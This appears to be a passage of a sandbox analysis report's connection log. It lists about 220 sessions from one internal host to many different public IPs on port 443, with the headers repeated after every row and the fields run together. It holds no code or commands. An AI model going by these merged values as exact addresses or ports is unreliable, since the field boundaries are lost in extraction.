                                            13024192.168.2.2348024205.87.245.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13025192.168.2.234267286.219.65.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13026192.168.2.235992041.94.252.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13027192.168.2.235017025.107.119.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13028192.168.2.2336442147.132.15.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13029192.168.2.2344762109.131.30.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13030192.168.2.235949423.245.78.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13031192.168.2.234259057.53.133.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13032192.168.2.2355954147.183.196.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13033192.168.2.23362729.207.213.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13034192.168.2.2355812107.139.105.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13035192.168.2.2346756148.146.179.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13036192.168.2.233963082.50.215.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13037192.168.2.2352084135.155.108.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13038192.168.2.2346888118.217.10.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13039192.168.2.2340434160.144.58.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13040192.168.2.2348458157.213.251.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13041192.168.2.2341848153.74.180.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13042192.168.2.233572697.205.124.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13043192.168.2.235503217.168.243.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13044192.168.2.234510254.12.186.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13045192.168.2.235976014.245.89.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13046192.168.2.2342312159.179.234.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13047192.168.2.2344682192.184.54.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13048192.168.2.233300820.195.115.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13049192.168.2.23452845.58.4.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13050192.168.2.234983089.169.155.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13051192.168.2.233464092.124.137.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13052192.168.2.233783058.246.49.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13053192.168.2.2334206133.114.174.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13054192.168.2.2360386212.39.192.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13055192.168.2.2358776213.128.170.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13056192.168.2.2337176185.45.163.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13057192.168.2.234267081.165.215.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13058192.168.2.2357404149.235.238.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13059192.168.2.2339496185.3.45.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13060192.168.2.233450838.140.8.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13061192.168.2.2353612203.117.112.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13062192.168.2.2355992163.33.56.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13063192.168.2.2337150147.241.119.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13064192.168.2.233365827.139.163.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13065192.168.2.236046037.95.188.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13066192.168.2.2346896184.67.224.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13067192.168.2.2349278142.203.50.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13068192.168.2.233375418.97.136.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13069192.168.2.235924884.75.118.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13070192.168.2.234274053.21.127.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13071192.168.2.2356628216.130.26.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13072192.168.2.2356212162.233.43.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13073192.168.2.2348094195.176.254.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13074192.168.2.234363245.50.64.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13075192.168.2.2349614190.182.142.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13076192.168.2.233799046.216.134.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13077192.168.2.2332790180.112.159.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13078192.168.2.234023020.215.67.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13079192.168.2.233634680.76.48.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13080192.168.2.2359898181.244.158.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13081192.168.2.2350590203.207.33.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13082192.168.2.234431084.104.201.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13083192.168.2.2343978165.173.95.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13084192.168.2.2355116158.203.195.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13085192.168.2.2339900189.199.123.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13086192.168.2.2358354107.206.207.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13087192.168.2.233981462.249.54.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13088192.168.2.233573418.167.235.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13089192.168.2.2359264204.220.152.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13090192.168.2.234176083.58.247.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13091192.168.2.2357156168.144.3.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13092192.168.2.2337164125.209.7.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13093192.168.2.233524663.127.75.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13094192.168.2.2344728176.9.246.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13095192.168.2.235714882.162.74.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13096192.168.2.2334624140.145.241.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13097192.168.2.2356406130.157.131.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13098192.168.2.234835087.95.157.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13099192.168.2.2342846124.172.12.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13100192.168.2.2351550209.177.104.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13101192.168.2.2341016213.85.245.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13102192.168.2.2357062142.139.72.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13103192.168.2.235951257.197.150.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13104192.168.2.2358034102.1.23.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13105192.168.2.2351518208.53.135.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13106192.168.2.2352334106.83.176.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13107192.168.2.2345418177.63.110.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13108192.168.2.235512839.13.213.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13109192.168.2.2356048209.212.233.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13110192.168.2.2333344115.117.106.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13111192.168.2.2334208141.46.57.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13112192.168.2.233648891.173.96.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13113192.168.2.2336218108.180.211.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13114192.168.2.2358414125.8.57.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13115192.168.2.2348842118.23.25.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13116192.168.2.234571436.167.84.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13117192.168.2.2354686111.168.219.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13118192.168.2.2358892186.157.253.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13119192.168.2.2339746116.240.165.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13120192.168.2.234499885.11.255.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13121192.168.2.2350124188.18.19.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13122192.168.2.2354590217.71.216.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13123192.168.2.2340966209.106.145.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13124192.168.2.235450876.127.129.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13125192.168.2.2334634197.158.177.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13126192.168.2.235127694.169.128.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13127192.168.2.2358144100.43.216.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13128192.168.2.2357964220.108.168.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13129192.168.2.234622098.81.130.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13130192.168.2.23446329.187.197.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13131192.168.2.233430258.132.159.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13132192.168.2.2345070169.121.70.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13133192.168.2.234002460.252.140.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13134192.168.2.2360962107.183.199.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13135192.168.2.2355664221.143.156.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13136192.168.2.235546258.149.254.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13137192.168.2.234139890.92.86.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13138192.168.2.2345884171.29.151.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13139192.168.2.2339200173.71.70.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13140192.168.2.2358664188.212.45.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13141192.168.2.233622880.19.16.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13142192.168.2.2342472217.142.6.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13143192.168.2.234534074.232.179.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13144192.168.2.233904047.215.49.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13145192.168.2.234901680.249.79.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13146192.168.2.2336830213.39.178.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13147192.168.2.233784874.234.18.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13148192.168.2.234358413.156.69.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13149192.168.2.2344302179.151.114.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13150192.168.2.236047019.86.8.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13151192.168.2.234416269.141.216.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13152192.168.2.235924631.20.100.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13153192.168.2.2340172140.89.73.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13154192.168.2.2335230116.209.29.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13155192.168.2.2349026197.98.199.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13156192.168.2.2346562151.13.233.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13157192.168.2.2343240107.54.180.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13158192.168.2.2359450136.131.237.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13159192.168.2.2351122177.197.240.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13160192.168.2.2352966185.47.200.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13161192.168.2.235019288.230.219.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13162192.168.2.234658282.32.146.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13163192.168.2.234256697.6.156.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13164192.168.2.233810663.159.136.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13165192.168.2.2360934126.146.9.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13166192.168.2.2342310219.89.192.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13167192.168.2.2359708129.92.127.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13168192.168.2.2349348102.114.190.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13169192.168.2.2343746138.33.130.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13170192.168.2.2347616108.2.162.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13171192.168.2.23409682.224.245.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13172192.168.2.233403089.153.18.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13173192.168.2.234013240.158.110.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13174192.168.2.235275632.109.86.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13175192.168.2.23436521.122.159.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13176192.168.2.2348188188.7.205.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13177192.168.2.2346298113.106.146.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13178192.168.2.2338786131.255.108.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13179192.168.2.233772290.235.7.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13180192.168.2.2346064223.45.140.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13181192.168.2.234828845.203.193.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13182192.168.2.2346610128.51.106.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13183192.168.2.2350910222.147.40.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13184192.168.2.2335138210.20.153.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13185192.168.2.234116239.169.179.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13186192.168.2.2356674181.122.169.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13187192.168.2.236082466.178.16.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13188192.168.2.2341174174.93.87.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13189192.168.2.2341196174.230.245.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13190192.168.2.235513845.14.143.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13191192.168.2.235040054.143.34.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13192192.168.2.234475243.245.187.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13193192.168.2.2345664112.10.202.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13194192.168.2.234312469.200.25.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13195192.168.2.2357204189.125.132.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13196192.168.2.234221046.32.144.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13197192.168.2.2336704182.3.147.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13198192.168.2.2349544124.241.44.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13199192.168.2.2354372155.146.204.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13200192.168.2.234567488.100.16.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13201192.168.2.2351902104.37.175.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13202192.168.2.233762661.193.223.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13203192.168.2.233916259.27.82.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13204192.168.2.235378457.179.193.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13205192.168.2.2356510122.107.150.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13206192.168.2.2354800223.79.11.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13207192.168.2.235381476.13.181.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13208192.168.2.2348006207.240.193.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13209192.168.2.23574501.41.11.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13210192.168.2.233814034.110.56.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13211192.168.2.235271670.251.239.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13212192.168.2.234835241.226.3.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13213192.168.2.235916020.192.65.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13214192.168.2.2357628216.209.193.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13215192.168.2.235518266.76.38.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13216192.168.2.233695886.122.192.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13217192.168.2.2338292201.14.107.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13218192.168.2.2348820195.76.48.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13219192.168.2.2356134135.1.72.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13220192.168.2.2343242126.67.49.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13221192.168.2.23494001.10.212.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13222192.168.2.233861020.121.249.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13223192.168.2.2345830135.100.103.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13224192.168.2.2334998176.99.200.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13225192.168.2.2360012169.233.169.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13226192.168.2.2339948105.119.159.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13227192.168.2.233530478.137.136.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13228192.168.2.234761484.98.94.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13229192.168.2.2338048100.221.191.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13230192.168.2.2342844194.41.176.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13231192.168.2.2337210140.117.18.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13232192.168.2.2347658219.25.197.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13233192.168.2.2339916199.191.220.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13234192.168.2.233672057.33.113.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13235192.168.2.235623071.180.169.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13236192.168.2.2338060174.35.139.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13237192.168.2.2334896170.113.190.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13238192.168.2.235797613.17.178.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13239192.168.2.2350938181.130.76.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13240192.168.2.2343602129.113.146.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13241192.168.2.23480822.246.13.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13242192.168.2.2359290183.183.197.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13243192.168.2.2341436137.210.53.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13244192.168.2.2335786178.48.170.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13245192.168.2.2359644207.253.181.244443
                                            TimestampBytes transferredDirectionData


